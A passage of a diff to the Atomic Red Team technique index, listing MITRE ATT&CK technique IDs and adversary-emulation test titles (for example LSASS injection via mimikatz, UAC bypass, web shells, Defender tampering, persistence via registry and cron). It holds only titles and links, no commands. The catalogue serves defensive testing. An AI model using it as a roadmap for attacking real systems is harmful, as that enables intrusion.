Extensions](../../T1547.006/T1547.006.md) + - Atomic Test #1: Linux - Load Kernel Module via insmod [linux] +- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1547.008 LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1543.001 Launch Agent](../../T1543.001/T1543.001.md) + - Atomic Test #1: Launch Agent [macos] +- [T1543.004 Launch Daemon](../../T1543.004/T1543.004.md) + - Atomic Test #1: Launch Daemon [macos] +- [T1053.004 Launchd](../../T1053.004/T1053.004.md) + - Atomic Test #1: Event Monitor Daemon Persistence [macos] +- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md) + - Atomic Test #1: Create local account with admin priviliges [windows] +- [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md) + - Atomic Test #1: Logon Scripts - Mac [macos] +- [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md) + - Atomic Test #1: Logon Scripts [windows] +- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.007 Netsh Helper DLL](../../T1546.007/T1546.007.md) + - Atomic Test #1: Netsh Helper DLL Registration [windows] +- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md) + - Atomic Test #1: Parent PID Spoofing using PowerShell [windows] + - Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows] + - Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows] + - Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows] + - Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows] +- T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) + - Atomic Test #1: Execution of program.exe as service with unquoted service path [windows] +- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md) + - Atomic Test #1: Plist Modification [macos] +- [T1547.010 Port Monitors](../../T1547.010/T1547.010.md) + - Atomic Test #1: Add Port Monitor persistence in Registry [windows] +- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md) + - Atomic Test #1: Append malicious start-process cmdlet [windows] +- T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1055.012 Process Hollowing](../../T1055.012/T1055.012.md) + - Atomic Test #1: Process Hollowing using PowerShell [windows] + - Atomic Test #2: RunPE via VBA [windows] +- [T1055 Process Injection](../../T1055/T1055.md) + - Atomic Test #1: Shellcode execution via VBA [windows] + - Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows] +- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md) + - Atomic Test #1: rc.common [macos] +- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md) + - Atomic Test #1: Re-Opened Applications [macos] + - Atomic Test #2: Re-Opened Applications [macos] +- [T1547.001 Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) + - Atomic Test #1: Reg Key Run [windows] + - Atomic Test #2: Reg Key RunOnce [windows] + - Atomic Test #3: PowerShell Registry RunOnce [windows] + - Atomic Test #4: Suspicious vbs file run from startup Folder [windows] + - Atomic Test #5: Suspicious jse file run from startup Folder [windows] + - Atomic Test #6: Suspicious bat file run from startup Folder [windows] + - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows] +- T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md) + - Atomic Test #1: Scheduled Task Startup Script [windows] + - Atomic Test #2: Scheduled task Local [windows] + - Atomic Test #3: Scheduled task Remote [windows] + - Atomic Test #4: Powershell Cmdlet Scheduled Task [windows] + - Atomic Test #5: Task Scheduler via VBA [windows] + - Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows] +- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.002 Screensaver](../../T1546.002/T1546.002.md) + - Atomic Test #1: Set Arbitrary Binary as Screensaver [windows] +- [T1547.005 Security Support Provider](../../T1547.005/T1547.005.md) + - Atomic Test #1: Modify SSP configuration in registry [windows] +- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) + - Atomic Test #1: Service Registry Permissions Weakness [windows] + - Atomic Test #2: Service ImagePath Change with reg.exe [windows] +- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md) + - Atomic Test #1: Make and modify binary from C source [macos, linux] + - Atomic Test #2: Set a SetUID flag on file [macos, linux] + - Atomic Test #3: Set a SetGID flag on file [macos, linux] +- [T1547.009 Shortcut Modification](../../T1547.009/T1547.009.md) + - Atomic Test #1: Shortcut Modification [windows] + - Atomic Test #2: Create shortcut to cmd in startup folders [windows] +- [T1037.005 Startup Items](../../T1037.005/T1037.005.md) + - Atomic Test #1: Add file to Local Library StartupItems [macos] +- [T1548.003 Sudo and Sudo Caching](../../T1548.003/T1548.003.md) + - Atomic Test #1: Sudo usage [macos, linux] + - Atomic Test #2: Unlimited sudo cache timeout [macos, linux] + - Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux] +- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md) + - Atomic Test #1: Create Systemd Service [linux] +- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md) + - Atomic Test #1: Create Systemd Service and Timer [linux] +- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1547.003 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1134.001 Token Impersonation/Theft](../../T1134.001/T1134.001.md) + - Atomic Test #1: Named pipe client impersonation [windows] + - Atomic Test #2: `SeDebugPrivilege` token duplication [windows] +- [T1546.005 Trap](../../T1546.005/T1546.005.md) + - Atomic Test #1: Trap [macos, linux] +- [T1546.004 Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) + - Atomic Test #1: Add command to .bash_profile [macos, linux] + - Atomic Test #2: Add command to .bashrc [macos, linux] +- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.003 Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) + - Atomic Test #1: Persistence via WMI Event Subscription [windows] +- [T1543.003 Windows Service](../../T1543.003/T1543.003.md) + - Atomic Test #1: Modify Fax service to run PowerShell [windows] + - Atomic Test #2: Service Installation CMD [windows] + - Atomic Test #3: Service Installation PowerShell [windows] +- [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md) + - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows] + - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows] + - Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows] +- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) + # defense-evasion - T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -588,6 +405,7 @@ - [T1027.001 Binary Padding](../../T1027.001/T1027.001.md) - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux] - T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1612 Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md) - Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows] - Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows] @@ -626,6 +444,7 @@ - Atomic Test #3: Clear Event Logs via VBA [windows] - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1553.002 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1027.004 Compile After Delivery](../../T1027.004/T1027.004.md) - Atomic Test #1: Compile After Delivery using csc.exe [windows] - Atomic Test #2: Dynamic C# Compile [windows] @@ -653,6 +472,7 @@ - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md) - Atomic Test #1: Deobfuscate/Decode Files Or Information [windows] - Atomic Test #2: Certutil Rename and Decode [windows] +- T1610 Deploy Container [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1006 Direct Volume Access](../../T1006/T1006.md) - Atomic Test #1: Read volume boot sector via DOS device path (PowerShell) [windows] - T1562.008 Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -697,8 +517,13 @@ - Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1601.002 Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) + - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] + - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] - [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md) - Atomic Test #1: Process Injection via mavinject.exe [windows] - T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -721,7 +546,7 @@ - T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1553.001 Gatekeeper Bypass](../../T1553.001/T1553.001.md) - Atomic Test #1: Gatekeeper Bypass [macos] -- T1484 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484.001 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md) - Atomic Test #1: Create a hidden file in a hidden directory [linux, macos] @@ -772,9 +597,6 @@ - Atomic Test #8: InstallUtil evasive invocation [windows] - T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1149 LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1574.006 LD_PRELOAD](../../T1574.006/T1574.006.md) - - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] - - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] - [T1222.002 Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) - Atomic Test #1: chmod - Change file or folder mode (numeric mode) [macos, linux] - Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [macos, linux] @@ -791,6 +613,7 @@ - Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows] - Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows] - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1553.005 Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md) - Atomic Test #1: Creating W32Time similar named service using schtasks [windows] - Atomic Test #2: Creating W32Time similar named service using sc [windows] @@ -996,6 +819,215 @@ - Atomic Test #3: WMIC bypass using local XSL file [windows] - Atomic Test #4: WMIC bypass using remote XSL file [windows] +# persistence +- [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md) + - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows] + - Atomic Test #2: Replace binary of sticky keys [windows] +- [T1098 Account Manipulation](../../T1098/T1098.md) + - Atomic Test #1: Admin Account Manipulate [windows] + - Atomic Test #2: Domain Account and Group Manipulate [windows] +- T1547.014 Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1098.001 Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md) + - Atomic Test #1: Install AppInit Shim [windows] +- [T1546.011 Application Shimming](../../T1546.011/T1546.011.md) + - Atomic Test #1: Application Shim Installation [windows] + - Atomic Test #2: New shim database files created in the default shim database directory [windows] + - Atomic Test #3: Registry key creation and/or modification events for SDB [windows] +- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md) + - Atomic Test #1: At - Schedule a job [linux] +- [T1053.002 At (Windows)](../../T1053.002/T1053.002.md) + - Atomic Test #1: At.exe Scheduled task [windows] +- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1197 BITS Jobs](../../T1197/T1197.md) + - Atomic Test #1: Bitsadmin Download (cmd) [windows] + - Atomic Test #2: Bitsadmin Download (PowerShell) [windows] + - Atomic Test #3: Persist, Download, & Execute [windows] + - Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows] +- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1176 Browser Extensions](../../T1176/T1176.md) + - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos] + - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos] + - Atomic Test #3: Firefox [linux, windows, macos] + - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos] +- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md) + - Atomic Test #1: User scope COR_PROFILER [windows] + - Atomic Test #2: System Scope COR_PROFILER [windows] + - Atomic Test #3: Registry-free process scope COR_PROFILER [windows] +- [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md) + - Atomic Test #1: Change Default File Association [windows] +- T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md) + - Atomic Test #1: ListCronjobs [linux, macos] + - Atomic Test #2: CreateCronjob [linux, macos] +- T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1053.003 Cron](../../T1053.003/T1053.003.md) + - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] + - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] +- [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md) + - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows] +- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) + - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] +- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) + - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows] +- [T1136.002 Domain Account](../../T1136.002/T1136.002.md) + - Atomic Test #1: Create a new Windows domain admin user [windows] + - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows] + - Atomic Test #3: Create a new Domain Account using PowerShell [windows] +- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) + - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] + - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] +- [T1546.014 Emond](../../T1546.014/T1546.014.md) + - Atomic Test #1: Persistance with Event Monitor - emond [macos] +- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1133 External Remote Services](../../T1133/T1133.md) + - Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows] +- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1062 Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md) + - Atomic Test #1: IFEO Add Debugger [windows] + - Atomic Test #2: IFEO Global Flags [windows] +- T1525 Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1547.006 Kernel Modules and Extensions](../../T1547.006/T1547.006.md) + - Atomic Test #1: Linux - Load Kernel Module via insmod [linux] +- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1547.008 LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1543.001 Launch Agent](../../T1543.001/T1543.001.md) + - Atomic Test #1: Launch Agent [macos] +- [T1543.004 Launch Daemon](../../T1543.004/T1543.004.md) + - Atomic Test #1: Launch Daemon [macos] +- [T1053.004 Launchd](../../T1053.004/T1053.004.md) + - Atomic Test #1: Event Monitor Daemon Persistence [macos] +- [T1136.001 Local Account](../../T1136.001/T1136.001.md) + - Atomic Test #1: Create a user account on a Linux system [linux] + - Atomic Test #2: Create a user account on a MacOS system [macos] + - Atomic Test #3: Create a new user in a command prompt [windows] + - Atomic Test #4: Create a new user in PowerShell [windows] + - Atomic Test #5: Create a new user in Linux with `root` UID and GID. [linux] + - Atomic Test #6: Create a new Windows admin user [windows] +- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md) + - Atomic Test #1: Create local account with admin priviliges [windows] +- [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md) + - Atomic Test #1: Logon Scripts - Mac [macos] +- [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md) + - Atomic Test #1: Logon Scripts [windows] +- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.007 Netsh Helper DLL](../../T1546.007/T1546.007.md) + - Atomic Test #1: Netsh Helper DLL Registration [windows] +- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1137 Office Application Startup](../../T1137/T1137.md) + - Atomic Test #1: Office Application Startup - Outlook as a C2 [windows] +- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1137.002 Office Test](../../T1137.002/T1137.002.md) + - Atomic Test #1: Office Application Startup Test Persistence [windows] +- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1137.004 Outlook Home Page](../../T1137.004/T1137.004.md) + - Atomic Test #1: Install Outlook Home Page Persistence [windows] +- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md) + - Atomic Test #1: Install and Register Password Filter DLL [windows] +- T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) + - Atomic Test #1: Execution of program.exe as service with unquoted service path [windows] +- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md) + - Atomic Test #1: Plist Modification [macos] +- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1547.010 Port Monitors](../../T1547.010/T1547.010.md) + - Atomic Test #1: Add Port Monitor persistence in Registry [windows] +- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md) + - Atomic Test #1: Append malicious start-process cmdlet [windows] +- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md) + - Atomic Test #1: rc.common [macos] +- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md) + - Atomic Test #1: Re-Opened Applications [macos] + - Atomic Test #2: Re-Opened Applications [macos] +- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1547.001 Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) + - Atomic Test #1: Reg Key Run [windows] + - Atomic Test #2: Reg Key RunOnce [windows] + - Atomic Test #3: PowerShell Registry RunOnce [windows] + - Atomic Test #4: Suspicious vbs file run from startup Folder [windows] + - Atomic Test #5: Suspicious jse file run from startup Folder [windows] + - Atomic Test #6: Suspicious bat file run from startup Folder [windows] + - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows] +- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md) + - Atomic Test #1: Modify SSH Authorized Keys [macos, linux] +- [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md) + - Atomic Test #1: Scheduled Task Startup Script [windows] + - Atomic Test #2: Scheduled task Local [windows] + - Atomic Test #3: Scheduled task Remote [windows] + - Atomic Test #4: Powershell Cmdlet Scheduled Task [windows] + - Atomic Test #5: Task Scheduler via VBA [windows] + - Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows] +- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.002 Screensaver](../../T1546.002/T1546.002.md) + - Atomic Test #1: Set Arbitrary Binary as Screensaver [windows] +- [T1547.005 Security Support Provider](../../T1547.005/T1547.005.md) + - Atomic Test #1: Modify SSP configuration in registry [windows] +- T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) + - Atomic Test #1: Service Registry Permissions Weakness [windows] + - Atomic Test #2: Service ImagePath Change with reg.exe [windows] +- [T1547.009 Shortcut Modification](../../T1547.009/T1547.009.md) + - Atomic Test #1: Shortcut Modification [windows] + - Atomic Test #2: Create shortcut to cmd in startup folders [windows] +- [T1037.005 Startup Items](../../T1037.005/T1037.005.md) + - Atomic Test #1: Add file to Local Library StartupItems [macos] +- T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md) + - Atomic Test #1: Create Systemd Service [linux] +- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md) + - Atomic Test #1: Create Systemd Service and Timer [linux] +- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1547.003 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1505.002 Transport Agent](../../T1505.002/T1505.002.md) + - Atomic Test #1: Install MS Exchange Transport Agent Persistence [windows] +- [T1546.005 Trap](../../T1546.005/T1546.005.md) + - Atomic Test #1: Trap [macos, linux] +- [T1546.004 Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) + - Atomic Test #1: Add command to .bash_profile [macos, linux] + - Atomic Test #2: Add command to .bashrc [macos, linux] +- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1505.003 Web Shell](../../T1505.003/T1505.003.md) + - Atomic Test #1: Web Shell Written to Disk [windows] +- [T1546.003 Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) + - Atomic Test #1: Persistence via WMI Event Subscription [windows] +- [T1543.003 Windows Service](../../T1543.003/T1543.003.md) + - Atomic Test #1: Modify Fax service to run PowerShell [windows] + - Atomic Test #2: Service Installation CMD [windows] + - Atomic Test #3: Service Installation PowerShell [windows] +- [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md) + - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows] + - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows] + - Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows] +- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) + # impact - [T1531 Account Access Removal](../../T1531/T1531.md) - Atomic Test #1: Change User Password - Windows [windows] @@ -1071,6 +1103,7 @@ - T1580 Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1613 Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1087.002 Domain Account](../../T1087.002/T1087.002.md) - Atomic Test #1: Enumerate all accounts (Domain) [windows] - Atomic Test #2: Enumerate all accounts via PowerShell (Domain) [windows] @@ -1102,6 +1135,7 @@ - Atomic Test #2: File and Directory Discovery (PowerShell) [windows] - Atomic Test #3: Nix File and Diectory Discovery [macos, linux] - Atomic Test #4: Nix File and Directory Discovery 2 [macos, linux] +- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1087.001 Local Account](../../T1087.001/T1087.001.md) - Atomic Test #1: Enumerate all accounts (Local) [linux] - Atomic Test #2: View sudoers access [linux, macos] @@ -1190,6 +1224,7 @@ - Atomic Test #9: Griffon Recon [windows] - Atomic Test #10: Environment variables discovery on windows [windows] - Atomic Test #11: Environment variables discovery on macos and linux [macos, linux] +- T1614 System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1016 System Network Configuration Discovery](../../T1016/T1016.md) - Atomic Test #1: System Network Configuration Discovery on Windows [windows] - Atomic Test #2: List Windows Firewall Rules [windows] @@ -1233,11 +1268,14 @@ - T1588.004 Digital Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1583.001 Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1584.001 Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1608.004 Drive-by Target [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1585.002 Email Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1586.002 Email Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1585 Establish Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1587.004 Exploits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1588.005 Exploits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1608.003 Install Digital Certificate [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1608.005 Link Target [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1587.001 Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1588.001 Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1588 Obtain Capabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -1245,7 +1283,10 @@ - T1584.004 Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1585.001 Social Media Accounts [CONTRIBUTE A 